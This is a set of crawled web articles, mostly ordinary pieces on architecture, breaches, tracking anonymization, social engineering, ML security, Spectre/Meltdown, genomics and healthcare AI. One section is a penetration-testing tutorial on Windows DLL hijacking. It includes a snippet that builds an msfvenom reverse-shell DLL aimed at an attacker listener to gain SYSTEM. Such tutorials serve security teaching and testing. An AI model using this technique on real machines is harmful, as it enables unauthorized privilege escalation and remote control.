Kiuwan’s services provide extensive and digestible reviews of every step in the software supply chain, and deploy powerful solutions to counteract the most common cybersecurity threats. Contact Kiuwan for a free demo. | <urn:uuid:2a1169e9-4609-4b8a-89c0-cd5fde7e0e77> | CC-MAIN-2022-40 | https://www.kiuwan.com/application-security-for-energy-providers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00518.warc.gz | en | 0.943288 | 1,301 | 2.6875 | 3 |
The role of architecture in IT
When you are considering IT Architecture I don’t think that anybody would argue with the statements that:
- Requirements are the input for design activities that result in a design of an Object
- Design is the input for construction activities that result in an Object that conforms to Requirements
But where does Architecture fit into the picture? Whereas the artefacts Requirements, Design and Object are clearly demarcated and sequentially interrelated, the relationship between Architecture and these other artefacts is more ambiguous.
To which degree is Architecture influenced by an Object’s Requirements? Where does Architecture stop and Design start? Is there a direct relationship between Architecture and Object, or is Architecture translated into Design? These questions have puzzled and fascinated me for quite a while and, although I haven’t been able to eliminate the ambiguity, I’ve now arrived at an explanation that seems to work for me.
A useful definition
The most useful definition of Architecture that I could find was in the TOGAF 9.1 Management Overview (via www.togaf.info), adapted from ANSI/IEEE Standard 1471-2000:
“Architecture is the fundamental organization of something, embodied in:
- its components
- their relationships to each other and the environment
- the principles governing its design and evolution”
In other words, Architecture determines the type of Components that will be used to design (and evolve) something, and how they will be used. For instance: red bricks and oak beams will be used to design a Tudor style house. In this definition, Architecture and Design are separate artefacts.
The definition introduces the concept of Environment, which I interpret as the organizational context. An Architecture has been chosen because it’s effective for a particular organization. The Design of an Object within this Environment is informed by both the Requirements for the specific Object, and the generic Architecture that applies to all Designs in this Environment.
The irreversible part of design
Another helpful statement (I forget the source) is “Architecture is the practically irreversible part of Design”. I equate “practically irreversible” with financially prohibitive. Once a house has been built in Tudor style, that’s that. It would be cheaper to build a new house than to change a Tudor house to Bauhaus style. The ‘trouble’ with this statement is that Architecture seems to be part of Design. Apparently there is an architectural part of Design, and a non-architectural part but I can’t think of a name for the non-architectural part of Design.
This leads me to the following understanding:
- Architecture is determined by the characteristics of the Environment including reasonably expected long-term Requirements
- Architecture guides and confines the Design of Objects by determining both which types of Components may be used and how
I expect that my post-modernist friends will deride me for creating such a neat-and-tidy model but I hope that it’s food for thought. Comments most welcome, in particular which of these 4 Venn diagrams about the relationship between Architecture and Design seems right.
NASA revealed today that it was hacked earlier this year. In an internal memo sent to all employees, the agency said that an unknown intruder gained access to one of its servers storing the personal data of current and former employees. Social Security numbers were also compromised, NASA said.
The agency said it discovered the hack on October 23, almost two months ago. It is unclear why the agency waited nearly two months to notify employees, but it is common for US law enforcement to ask hacked organizations to delay notifying affected victims while they investigate an incident.
Commenting on the news, how NASA employees might be affected, and how the breach could have been avoided is Paul Walker, technical director at One Identity.
Expert Comments below:
Paul Walker, Technical Director at One Identity:
A keyword that is used in the NASA memo is the word “unknown.” Computer systems authenticate and authorise access to people and other “things,” such as other software, bots and machines. The trick here is to know what, or who, is requesting access, and what information they are requesting access to. The word “unknown” within the memo is worrying. Was this someone on the inside at NASA? Or was it a state actor from a potentially hostile foreign state? Who knows what the “unknown” hackers will do with the information but, given past breaches, it’s highly likely that it will end up for sale on the dark web. The affected NASA employees may find themselves at risk of social engineering, unwanted advertising or other potentially fraudulent risks.
If NASA had implemented basic advice from the National Institute of Standards and Technology (NIST) – who have a close relationship with various U.S. Government Administrations – then this breach may not have happened. As the NIST states, using MFA helps by adding an additional layer of security, making it harder for the bad guys to get in. With regard to the individuals that are requesting access, it’s all about risk mitigation. How confident are we that the person (or thing) requesting access is who they (or it) claims they are? Moreover, what are they doing with the access they’ve been given?
I would recommend that an organisation like NASA takes further action than simply implementing MFA on top of the usual password. For example, using a layered approach including password vaulting, automatic recording of access (including MFA) as well as real time behavioural analysis and alerting, would better protect NASA’s network, and employee data, from being compromised in the future.” | <urn:uuid:c948b06e-4cb4-4a67-b2b5-be41c158ffed> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/expert-comments/nasa-discloses-data-breach/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00518.warc.gz | en | 0.959556 | 531 | 2.609375 | 3 |
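As background on how one widely used MFA factor works in practice, the sketch below (Python, using the third-party pyotp library) generates and verifies a time-based one-time password of the kind produced by authenticator apps. The secret is generated on the fly purely for illustration; real deployments provision and store it securely per user.

    # Minimal TOTP sketch using the pyotp library (pip install pyotp).
    import pyotp

    secret = pyotp.random_base32()      # normally provisioned once per user
    totp = pyotp.TOTP(secret)           # 30-second time step by default

    code = totp.now()                   # what the authenticator app displays
    print("Current one-time code:", code)

    # The server stores the same secret and checks the submitted code,
    # allowing a small clock-drift window.
    print("Verified:", totp.verify(code, valid_window=1))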
Tracking of our browsing behavior is part of the daily routine of internet use. Companies use it to adapt ads to the personal needs of potential clients or to measure their range. Many providers of tracking services advertise secure data protection by generalizing datasets and anonymizing data in this way.
Tracking services collect large amounts of data of internet users. These data include the websites accessed, but also information on the end devices used, the time of access (timestamp) or location information.
“As these data are highly sensitive and closely tied to individual persons, many companies use generalization to apparently anonymize them and to bypass data security regulations,” says Professor Thorsten Strufe, Head of the “Practical IT Security” Research Group of KIT.
By means of generalization, the level of detailing of the information is reduced, such that an identification of individuals is supposed to be impossible. For example, location information is restricted to the region, the time of access is limited to the day, or the IP address is shortened by some figures.
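To make the idea of generalization concrete, here is a minimal Python sketch (purely illustrative, not the procedure used in the study) that coarsens the three fields mentioned above: truncating an IP address, reducing a timestamp to the day, and reducing a location to a region. All values are invented.

    from datetime import datetime

    def generalize(record):
        """Coarsen a single page-view record in place (illustrative only)."""
        octets = record["ip"].split(".")
        record["ip"] = ".".join(octets[:2] + ["0", "0"])          # drop host part
        ts = datetime.fromisoformat(record["timestamp"])
        record["timestamp"] = ts.date().isoformat()                # keep the day only
        record["location"] = record["location"].split(",")[-1].strip()  # region only
        return record

    view = {"ip": "203.0.113.42",
            "timestamp": "2020-06-22T14:37:05",
            "location": "Karlsruhe, Baden-Wuerttemberg"}
    print(generalize(view))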
Strufe, together with his team and colleagues of TUD, have now studied whether this method really allows no conclusions to be drawn with respect to the individual.
With the help of a large volume of metadata of German websites with 66 million users and over 2 billion page views, the computer scientists succeeded in not only drawing conclusions with respect to the websites accessed, but also with respect to the chains of page views, the so-called click traces. The data were made available by INFOnline, an institution measuring the data range in Germany.
The course of page views is of high importance
“To test the effectiveness of generalization, we analyzed two application scenarios,” Strufe says. “First, we checked all click traces for uniqueness. If a click trace, that is the course of several successive page views, can be distinguished clearly from others, it is no longer anonymous.”
It was found that information on the website accessed and the browser used has to be removed completely from the data to prevent conclusions to be drawn with respect to persons.
“The data will only become anonymous, when the sequences of single clicks are shortened, which means that they are stored without any context, or when all information, except for the timestamp, is removed,” Strufe says.
“Even if the domain, the allocation to a subject, such as politics or sports, and the time are stored on a daily basis only, 35 to 40 percent of the data can be assigned to individuals.” For this scenario, the researchers found that generalization does not correspond to the definition of anonymity.
A few observations are sufficient to identify user profiles
In addition, the researchers checked whether even subsets of a click trace allow conclusions to be drawn with respect to individuals.
“We linked the generalized information from the database to other observations, such as links shared on social media or in chats. If, for example, the time is generalized precisely to the minute, one observation is sufficient to clearly assign 20 percent of the click traces to a person,” says Clemens Deusser, doctoral researcher of Strufe’s team, who was largely involved in the study.
“Another two observations increase the success to more than 50 percent. Then, it is easily obvious from the database which other websites were accessed by the person and which contents were viewed.” Even if the timestamp is stored with the precision of a day, only five additional observations are needed to identify the person.
“Our results suggest that simple generalization is not suited for effectively anonymizing web tracking data. The data remain traceable to the person, and anonymization is ineffective. To reach effective data protection, methods extending far beyond this have to be applied, such as adding noise by randomly inserting minor misobservations into the data,” Strufe recommends.
Since well-known hacker Kevin Mitnick helped popularize the term 'social engineering' in the 1990s, both physical and cybersecurity professionals have become increasingly aware of the risks associated with the human element. The idea itself, and many of the techniques associated with social engineering, have been around as long as there have been scam artists.
But today an online trickster can wreak havoc for individuals and organizations with greater ease and efficiency than ever before. That hackers exploit common psychological vulnerabilities to compromise network security or steal funds is not news. What is news is how those vulnerabilities are changing, and how they will reshape the cybersecurity landscape for the foreseeable future.
The Evolution of Social Engineering through the Pandemic
By exploiting human nature through fear, the illusion of urgency, scarcity or familiarity, or simply the default human tendency to trust others, hackers have continued to repurpose well-worn tactics to convince unsuspecting users to follow their directions. Whether that has meant sending funds or providing credentials, hackers have continued to use simple psychological techniques to fool even attentive individuals at both home and at work. The ability of hackers to get past our technological and human defenses can be surprising and frightening, as well as costly.
Making matters worse, hackers have recently discovered another exploitable human vulnerability: stress. Social, political, and economic instabilities dominate daily newscasts, and trust and confidence in authorities, as well as in our neighbors and coworkers, have been badly shaken.
Work-related stress, exhaustion, cynicism, and negativity have surged during the pandemic, with 42% of women and 35% of men in the United States saying that they feel burned out often or almost always in 2021. Baseline behavioral health has significantly declined during the COVID-19 pandemic, and employees are still discovering how to work in a remote-first world. Distraction, stress, and fatigue all play a role in an employee’s cybersecurity decisions and increased levels can leave individuals and organizations more vulnerable to cybercrime.
The Connection Between Stress and Cybersecurity
Stress affects concentration, short-term memory, decision-making, problem-solving, and impulse control—all behavioral factors that can increase vulnerability. Opening the wrong email attachment or clicking on the wrong link when someone is frazzled can have catastrophic consequences. It is important to recognize the important behavioral reality that, as stress increases, situational awareness and vigilance decrease, and executional errors increase. There is little denying that human errors are the leading cause of security breaches, despite increased attention on the issue.
The risk of an outsider threat also increases as hackers realize that employees have their guards down due to emotional exhaustion or pandemic fatigue. Anger or resentment about an organization’s posture on vaccines, masks, or other health or social and political issues can increase the risk of an outsider threat. Employees with a real or perceived grievance may feel justified in striking back through a malicious action, alone as an insider, or be more open to working with an external threat actor who recruits them for espionage or sabotage.
Cybersecurity in a Post-Pandemic World
Unfortunately, the behavioral health consequences of the pandemic are just beginning to surface and will likely emerge to be as great or greater than the challenges of managing the medical risks of COVID-19. The American Psychological Association’s annual Stress in America poll indicates that the COVID-19 pandemic has already resulted in significant mental health distress with nearly half (48%) of those surveyed stating that their level of stress has increased compared with before the pandemic.
And the emotional toll of the pandemic is also likely to linger. While hackers have taken note of the gradual wear and tear on people’s defenses, and have sought to exploit these emerging human vulnerabilities, they may not yet be fully aware of their long-term potential. The behavioral consequences of this crisis will likely continue for several years after the public health threat has abated.
Protecting the People from Themselves
People are the weakest link in the cybersecurity chain. That link was already weak simply due to innate cognitive and behavioral traits that are just part of human nature. That said, it is increasingly important for anyone concerned with cybersecurity to recognize that this link has grown weaker under the stress of the pandemic and related socio-economic challenges, and that it is likely to grow weaker yet over the next months and years.
In addition to working with partners, including human resources and employee assistance professionals, to better support our employees, it will be necessary to use technology to protect the human element. By using the advanced strategies and technologies to recognize and block malicious attempts to exploit our employees, we can better protect them, and our organizations, from harm.
To learn more about the human element in cybersecurity, download A Perfect Storm for Social Engineering: Anticipating the Human Element in Post-Pandemic Cybersecurity. | <urn:uuid:baa103ee-ebf3-46e8-b8bc-44feae4f0b7f> | CC-MAIN-2022-40 | https://abnormalsecurity.com/blog/weakest-link-employees-cybersecurity | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00518.warc.gz | en | 0.954714 | 986 | 2.9375 | 3 |
The security industry is rife with data protection challenges. It faces catastrophic cyberattacks. And the troubles continue to mount with the rise of web-connected devices. Adding salt to the injury, is the shortage of skilled cyber talent, which fail to avert the burgeoning stress. With snowballing disruption, a prominent branch of technology development that shows promising signs to alleviate the security risks is machine learning. It has opened a new realm of data protection by leveraging the power of data and automation.
Machine learning is a branch of artificial intelligence (AI) and works on the principle of human emulation — learning from experience and patterns much like humans do, but without human intervention. The technology has grown greatly in the past five years. The evolution can be attributed to a host of factors, including smart hardware, distributed computing, and the cloud. Google, Facebook, and Amazon are already forging ahead on the path of machine learning innovation, enabling smart search engines, dynamic news feeds, and unerring product recommendations respectively.
Machine learning: disruption sweeping the security landscape
Back in the day, companies relied on static, rule-based engines to identify behavioral patterns that indicate looming threats. However, these indications often fell wide of the mark, and the success rate was low. With advancements in machine learning, companies are empowered with data deception technology and real-time anomaly handling that leave no scope for guesswork and manual intervention. Subsequently, the reaction to breaches has also smartened up.
The process is steeped in the essentials of big data. Organizations integrate a pool of behavioral data from various sources. This consumer data is cleaned, organized, and analyzed for insights that reveal anomalies (dangers at hand) and alert authorities to act. When smart personnel meet smarter technology that improves over time, a unique springboard of opportunity is created, enabling defenders to combat cyberattacks effectively.
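The sketch below (Python with scikit-learn; the feature values are invented) shows the general shape of such a pipeline: fit an anomaly detector on historical behavioral data, then flag new events that deviate from the learned pattern.

    # Toy anomaly-detection sketch with scikit-learn's IsolationForest.
    # Features per login event: [hour of day, MB transferred, failed attempts]
    from sklearn.ensemble import IsolationForest
    import numpy as np

    normal_logins = np.array([[9, 120, 0], [10, 90, 1], [14, 150, 0],
                              [11, 110, 0], [16, 130, 1], [13, 95, 0]])

    detector = IsolationForest(contamination=0.1, random_state=42)
    detector.fit(normal_logins)

    new_events = np.array([[10, 100, 0],      # looks routine
                           [3, 4800, 7]])     # 3 a.m., huge transfer, many failures
    print(detector.predict(new_events))       # 1 = normal, -1 = flagged anomaly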
Machine learning as a security net
Swift detection of malicious activities
Machine learning algorithms are instrumental in detecting malicious activities swiftly and mitigating them in a time-bound manner. The vulnerabilities are diagnosed within seconds and eliminated on the fly before they can unleash damage to the organization.
Analysis of mobile touch-points
Machine learning is coming to mobile phones with a great tempo, and the amalgam is galvanizing a new era of information security. While the most important applications remain the image recognition systems and voice-based experiences powered by Google Assistant, Amazon’s Alexa, and Apple’s Siri, the future possibilities are endless and unprecedented. Machine learning, coupled with AI and the Internet of Things (IoT), collects data and leverages its value to enable devices that function on their own and take informed decisions. Subject detection by smart cameras and translating languages in real time are other significant applications.
Automated redundant tasks
Automating repetitive tasks is the cornerstone benefit of every new-age digital technology gracing humankind, and machine learning is no exception. According to the team at techiespad, ML-based algorithms can take up tactical fights against mundane security issues, thereby freeing time for other strategic priorities. This is a strong step towards intelligent resource allocation and improved productive capacity.
Improved human analysis
Machine learning enhances and consolidates human analysis to an unmatched level. Humans are empowered to detect, analyze, and mitigate threats with greater quality and precision across an array of aspects that includes network analysis, endpoint protection, and vulnerability assessment.
Effective zero-day vulnerability closure
Zero-day attacks appear like a bolt out of the blue, targeting unsecured IoT devices. And use cases suggest that machine learning is an effective weapon to counter such attacks. The technology works by dodging vulnerabilities and restricting the patch exploits before they end up as data breaches.
The encircling dangers
Machine learning has its dangers too.
Attackers are deploying machine learning too with a view to achieving automated hacks that sabotage data security. The ‘bad actors’ are launching savvier attacks after studying and analyzing the machines on target and identifying vulnerabilities on the go.
Data tampering is another big roadblock to effective machine learning application. If attackers tamper with the source data, they manipulate the insights and trick systems into believing something that isn’t there. Attackers hatch strategies to manipulate features of malware-detection code and eliminate its effectiveness, thereby rendering the algorithm powerless. As a result, malware passes as clean code. The hacking of data and turning it against itself is a security crisis that needs a speedy fix. Building scalable systems that can accommodate large databases while adapting to human behavior in real time is also a tightrope walk.
Commercializing machine learning is worrisome. Companies are capitalizing on the huge hype around the technology and selling products that create a false sense of security. The catchphrase here is ‘supervised learning’, which entails choosing and labeling databases that algorithms are trained on. The algorithms, as a result, become defensive against a cache of attacks, a certain few and known. Not all and anomalous.
And last but not least, it’s language that acts as a barrier to machine learning application. Remember how Facebook was forced to abandon its AI experiments when machines developed their own language, which humans found strange to interpret. The kind of deep learning applied there must be unimaginably powerful. Empowering machines to function on their own is the new, fascinating talk, but the implications could be ruinous if machines process text to create language humans can’t understand.
Machine learning is a strong stimulus, raising a new set of machine-accelerated humans and building a best-of-breed security landscape. As of now, the technology is flourishing to help detect and obliterate security threats. In the future, a strong level of differentiation will be achieved when ML specialization becomes handy via breakthrough products. However, it’s important for companies to develop products while focusing on the need to monitor and minimize the associated risks. Mind that we are as strong as we are vulnerable in the face of the fast-streaming digital renaissance. Enthusiastic hopping on the bandwagon can wobble the ride.
In Windows environments, when an application or a service starts, it looks for a number of DLLs in order to function properly. If these DLLs don’t exist or are implemented in an insecure way (DLLs are called without using a fully qualified path), then it is possible to escalate privileges by forcing the application to load and execute a malicious DLL file.
It should be noted that when an application needs to load a DLL, it will search the following locations in order:
- The directory from which the application is loaded
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
Step 1 – Processes with Missing DLL’s
The first step is to list all the processes on the system and discover those processes which are running as SYSTEM and are missing DLLs. This can be done just by using the Process Monitor tool from Sysinternals and applying the filters below:
Process Monitor will identify whether there is any DLL that the application tries to load, as well as the actual path where the application is looking for the missing DLL.
In this example the process Bginfo.exe is missing several DLL files which possibly can be used for privilege escalation.
Step 2 – Folder Permissions
By default, if software is installed in the C:\ directory instead of C:\Program Files, then authenticated users will have write access to that directory. Additionally, software like Perl, Python, Ruby etc. is usually added to the PATH variable. This gives an opportunity for privilege escalation, since the user can write a malicious DLL to that directory, which will be loaded the next time the process restarts, running with the permissions of that process.
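A quick way to check for this condition is to enumerate the directories in the PATH variable and test which of them the current user can write to. The Python sketch below is a rough check of that kind; it only tests write access for the current user and is no substitute for reviewing the actual ACLs.

    # List PATH directories that the current user can write to.
    # Writable entries are candidate locations for planting a DLL.
    import os

    for directory in os.environ.get("PATH", "").split(os.pathsep):
        if directory and os.path.isdir(directory) and os.access(directory, os.W_OK):
            print("Writable PATH entry:", directory)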
Step 3 – DLL Hijacking
Metasploit can be used in order to generate a DLL that will contain a payload which will return a session with the privileges of the service.
The process Bginfo.exe is running as SYSTEM, which means these privileges will be granted to the user upon restart of the service, since the DLL with the malicious payload will be loaded and executed by the process.
As identified above, the process is missing Riched32.dll, so pentestlab.dll needs to be renamed to Riched32.dll. This will confuse the application and it will try to load it, as the application will think that this is a legitimate DLL. This malicious DLL needs to be dropped in one of the folders from which Windows loads DLL files.
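The payload DLL itself is typically produced with msfvenom. The Python snippet below just assembles and prints a command line of that general form; the LHOST/LPORT values are placeholders, and exact payload names may vary between Metasploit versions.

    # Build (but do not run) an msfvenom command that generates a payload DLL
    # named after the missing DLL. All values below are example placeholders.
    cmd = [
        "msfvenom",
        "-p", "windows/meterpreter/reverse_tcp",   # payload that returns a session
        "LHOST=192.168.1.10", "LPORT=4444",        # attacker listener (example values)
        "-f", "dll",                               # output format
        "-o", "Riched32.dll",                      # name of the missing DLL
    ]
    print(" ".join(cmd))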
As can be seen below, when the service restarted, a Meterpreter session opened with SYSTEM privileges through DLL hijacking.
DLL hijacking can also be performed through PowerSploit, since it contains three modules that can assist in the identification of processes that are missing DLLs, the discovery of folders on which users have modify permissions, and the generation of DLLs.
The module Find-ProcessDLLHijack will identify all the processes on the system that are trying to load DLLs which are missing.
The next step is the identification of paths whose contents the user can modify. The folders identified will be the ones where the malicious DLL needs to be planted.
The last step is to generate the hijackable DLL in one of the folders identified above with Modify (M) permissions.
In order to be able to escalate privileges via DLL hijacking, the following conditions need to be in place:
- Write Permissions on a system folder
- Software installation in a non-default directory
- A service that is running as SYSTEM and is missing a DLL
- Restart of the service
Discovering applications that are not installed in Program Files is quite common: apart from third-party applications, which are not forced to be installed in that path, there is also the possibility of custom-made software being found outside of these protected folders. Additionally, there are a number of Windows services, like IKEEXT (IKE and AuthIP IPsec Keying Modules), that are missing DLLs (wlbsctrl.dll) and can be exploited as well, either manually or automatically. For IKEEXT there is a specific Metasploit module:
Major tech firms are rushing to patch critical bugs, dubbed ‘Spectre’ and ‘Meltdown’, found in their processors before they can be exploited.
Researchers from Google’s Project Zero team have revealed serious issues in a vast array of chips across multiple manufacturers. The flaws date back as far as 1995.
There are three known variants of the issue so far. Spectre, which covers two of them, was discovered in chips made by Intel, AMD and ARM, while Meltdown affects Intel products and a recent ARM processor.
“As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack,” Google announced. “We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web.”
Read more: Satori malware code made public by hackers
As we lead ever more connected lives we are becoming more at risk of malicious attacks against our devices. Even hotels in the Austrian Alps have had their electronic doors hacked.
Many manufacturers have been blasé when it comes to IoT security but there is an urgent need to develop security alongside the new devices being introduced. We can be sure that cyber-criminals will be probing for new vulnerabilities and ‘grey hat’ hackers such as the creator of Brickerbot have proven the very real security risks faced by the Internet of Things.
Meltdown and Spectre allow the techniques used by processors to speed up their operation to be abused to obtain information about areas of memory not normally visible to an attacker, including encryption keys, passwords and other sensitive data.
A technical explanation of the vulnerabilities can be found in Project Zero’s report. Most devices, from smartphones and PCs to servers and IoT devices, are at risk from unprivileged code reading data it should not be able to access.
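On Linux systems, one practical way to see whether a host reports these issues as mitigated is to read the kernel's vulnerability status files. The Python sketch below does that; the sysfs path is exposed by kernels patched after the disclosure, so older kernels may not have it.

    # Print the kernel's reported status for Spectre, Meltdown and related issues.
    from pathlib import Path

    vuln_dir = Path("/sys/devices/system/cpu/vulnerabilities")
    if vuln_dir.is_dir():
        for entry in sorted(vuln_dir.iterdir()):
            print(f"{entry.name}: {entry.read_text().strip()}")
    else:
        print("Kernel does not expose vulnerability status (likely an older kernel)")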
The Google researchers have offered possible solutions to the processor vendors, though the vendors themselves are ultimately best-placed to tackle the issues, given their exclusive knowledge of their own chip architectures.
Vendors scramble to patch the holes
AMD has issued a statement since the vulnerabilities emerged, emphasising the company’s commitment to information security while offering some assurances: “The research described was performed in a controlled, dedicated lab environment by a highly knowledgeable team with detailed, non-public information about the processors targeted.” The company adds that “the described threat has not been seen in the public domain.”
Nonetheless, the company is planning to make software and operating system updates available that will resolve the issue with negligible performance impact.
ARM’s processors are used in countless smartphones and IoT devices, and the Softbank-owned company has promised that “all future Arm Cortex processors will be resilient to this style of attack or allow mitigation through kernel patches” and, given that the exploits are dependent upon malware running locally, emphasises the need for users to practice good security hygiene.
With Intel also planning to release security patches over the next few days, the flaws should soon be shored up. However, uncomfortable reports are emerging, claiming that Intel CEO Brian Krzanich was told of the flaws in June last year and subsequently sold a large portion of his stake in the company while the issues were not yet public knowledge.
Regardless of whether the stock sale was related, Intel, AMD and ARM will all be eager to see Meltdown and Spectre put to bed so that they can turn their focus back to their product roadmaps for 2018 and beyond. | <urn:uuid:dc78230d-6027-46cb-b378-13d363951ae4> | CC-MAIN-2022-40 | https://internetofbusiness.com/serious-security-flaws-spectre-meltdown-haunting-intel-amd-arm-chips/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00718.warc.gz | en | 0.964918 | 756 | 2.75 | 3 |
Researchers have found that different tissue functions are implemented by core biological machinery that is largely shared across tissues, rather than by each tissue’s own individual regulators.
Kimberly Glass, PhD, of the Channing Division of Network Medicine at Brigham and Women’s Hospital, and her team used PANDA (Passing Attributes between Networks for Data Assimilation) to create network models of the interactions between transcription factors and genes, finding that the presence of different tissue functions is the result of subtle, tissue-specific shifts in a regulatory network.
Genotype-Tissue Expression (GTEx) consortium
The core components of the network are the same for each tissue-specific function; they are simply combined in different ways with added genetic and environmental information. The team analyzed data from the Genotype-Tissue Expression (GTEx) consortium, among other regulatory information sources, to reconstruct and characterize regulatory networks for 38 tissues.
The PANDA model, created by Glass and her team in 2013, was chosen for this investigation because it explicitly models interactions between transcription factors, which control where, when and to what extent genes get activated. Understanding the complex interactions between transcription factors is an important step in finding patterns in the network and its genes, and it further informs how gene regulation implements a variety of specific tissue functions.
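As a toy illustration of the kind of object such network models work with (this is not PANDA itself, and the genes and edge weights are invented), the Python sketch below builds a small directed network of transcription factors and target genes and reports each factor's connectivity.

    # Toy transcription-factor -> gene regulatory network (invented data).
    import networkx as nx

    edges = [("TF1", "geneA", 0.9), ("TF1", "geneB", 0.4),
             ("TF2", "geneB", 0.7), ("TF2", "geneC", 0.8),
             ("TF3", "geneA", 0.2), ("TF3", "geneC", 0.6)]

    g = nx.DiGraph()
    g.add_weighted_edges_from(edges)

    for tf in ("TF1", "TF2", "TF3"):
        targets = list(g.successors(tf))
        strength = sum(g[tf][t]["weight"] for t in targets)
        print(f"{tf}: targets {targets}, total edge weight {strength:.1f}")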
There are approximately 30,000 genes in the human genome
Moreover, the regulation of specific tissue functions is largely independent of which transcription factors are present. There are approximately 30,000 genes in the human genome, but fewer than 2,000 of them encode transcription factors.
“A large number of processes must carry out for a tissue to function properly,” said Glass. “Rather than activating particular transcription factors to carry out these various processes. We find the networks connecting these regulators to target genes is reconfigured to more effectively coordinate the activation of tissue functions.”
The work also highlights the importance of considering specific tissues when developing drug therapies. Because shifted regulatory networks control different functions, understanding them is all the more important in order to anticipate the potential side effects of drugs outside of the target tissue.
Crucial time and tremendous amounts of resources are lost every day in the world’s healthcare systems. Misdiagnoses lead to unnecessary additional tests, delayed treatment plans, and diminished survival or remission rates compared with what would have transpired had the condition been caught and identified correctly earlier. False positives on tests. Trials, treatments and research completed in silos so there’s no leveraging the insights across the country or the world.
Machine learning offers lots of opportunities for the healthcare industry
Some healthcare and technology innovators are collaborating and trying to change our current reality by experimenting with artificial intelligence (AI) and machine learning. Computers and the algorithms they run can scrub colossal amounts of data—much faster and more accurately than human scientists or medical professionals—to unearth patterns and predictions to enhance disease diagnosis, inform treatment plans and enhance public health and safety.
Based on the extraordinary impact improvements to the healthcare system can have for so many people and its potential to save lives and money, healthcare has become a key industry for investment and efforts for AI and machine learning. Not only have major players such as IBM and Microsoft jumped into their own AI healthcare projects, but several start-ups and smaller organisations have begun their own efforts to create tools to aid healthcare.
And, the savings would be tremendous. One report from McKinsey estimates big data could save medicine and pharma up to $100B annually as a result of improved efficiencies in clinical trials and research, better insight for decision-making and new tools that will help insurers, regulators, physicians and consumers make better decisions.
Machine learning algorithms improve the more data they are exposed to. If there is one thing the healthcare systems has in abundance, it’s data. Due to different storage systems, ownership and privacy concerns, and no established process that allows people to easily share data with each other, there is a major amount of analysis that’s not currently being done that could glean tremendous results for patients, doctors and healthcare organisations.
AI aids in disease identification and diagnosis
Much of the AI work done thus far in healthcare is focused on disease identification and diagnosis. From Sophia Genetics, which is using AI to evaluate DNA to diagnose illnesses, to smartphone apps that can detect a concussion and monitor other concerns such as newborn jaundice, lung function in those suffering from chronic respiratory diseases, blood pressure, hemoglobin levels and even coughs, disease and health monitoring is at the forefront of machine learning efforts.
Since heart disease is a primary killer of human beings around the world, it’s no surprise that effort and focus from many AI innovators is on heart disease diagnosis and prevention. The current process to determine an individual’s risk factor for a heart attack is to look at the American College of Cardiology/American Heart Association’s (ACC/AHA) list of risk factors that include age, blood pressure and more. However, this is really a simplistic approach and doesn’t take into account medications someone might be on, the health of the patient’s other biological systems and other factors that could increase odds of a heart ailment. Several research teams, including those at Carnegie Mellon University and a study from Stephen Weng and his associates at University of Nottingham in the United Kingdom, are working toward enhancing machine learning so algorithms will be able to predict (better than humans) who is at risk and when they might be at risk for a heart attack. Preliminary results of the AI algorithms were significantly better at predicting heart attacks than the ACC/AHA guidelines.
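The sketch below (Python with scikit-learn; the patient records are invented) shows the bare-bones shape of such a risk model: train a classifier on labeled records with a few risk factors, then output a probability for a new patient. Real studies use far richer data and careful validation.

    # Toy cardiovascular-risk classifier (invented data, illustration only).
    # Features: [age, systolic BP, cholesterol, smoker (0/1)]
    from sklearn.linear_model import LogisticRegression
    import numpy as np

    X = np.array([[45, 120, 180, 0], [62, 150, 240, 1], [38, 115, 170, 0],
                  [70, 160, 260, 1], [55, 135, 210, 0], [66, 155, 250, 1]])
    y = np.array([0, 1, 0, 1, 0, 1])          # 1 = had a cardiac event

    model = LogisticRegression(max_iter=1000).fit(X, y)

    new_patient = np.array([[59, 148, 230, 1]])
    print("Estimated risk:", model.predict_proba(new_patient)[0][1])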
From liver disease to cancer and even psychosis and Schizophrenia, AI algorithms are changing the game in terms of disease diagnosis. Machines are now learning how to read CT scans and other imaging diagnostic tests to identify abnormalities. Although some predict the end of radiologists as we know them, others see AI acting as a radiologist’s assistant.
Crowdsourcing Treatment Options and Monitoring Drug Response
Another area where AI can impact healthcare is in the way information is gathered and shared about disease treatment. Dr. Tony Blau is one researcher who launched a start-up to put social media to work to connect people to share different cancer treatment options. Another group used Twitter and Facebook for pharmacovigilance as a way to source info about drug trials that might not have been reported to the industry or regulatory agencies. AI is already being used by the pharma industry in the initial screening of drug compounds as well as to determine what drugs might work better for individuals based on their biology.
Monitor Health Epidemics
There has already been some powerful indicators of AI’s influence to help monitor and predict health epidemics around the world, and in one case a computer algorithm identified an Ebola outbreak nine days before the World Health Organisation reported it. The computer sifted through social media sites, news reports and government websites to identify there was an outbreak. As with any algorithm, the more data it is given, the more learning is achieved and therefore the better it is in the future. Although the current work to identify outbreaks is imperfect, it has significant potential.
Artificial intelligence and machine learning in healthcare will continue to get better and impact disease prevention and diagnosis, extract more meaning from data across various clinical trials, help develop customised drugs based on an individual’s unique DNA and inform treatment options among other things. | <urn:uuid:6f5fc4a5-e9c3-4330-b993-6d7455fedc5d> | CC-MAIN-2022-40 | https://bernardmarr.com/artificial-intelligence-and-machine-learning-in-healthcare/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00718.warc.gz | en | 0.95152 | 1,086 | 3.265625 | 3 |
As part of their joint security awareness campaign aimed at the general public, the Fédération romande des consommateurs (FRC) and Navixia aim to point out the dangers of the internet and teach everyone how to avoid them. The operation combines information articles and fun security quizzes.
Topic of the month: Computer security: security gestures in our daily life
Some websites, applications or networks repeatedly require us to perform simple actions related to security. We comply mechanically, without thinking twice about it, because we want to access the proposed service. Still, all these precautions get boring over time. But maybe we don't understand how meaningful they really are... Or do we?
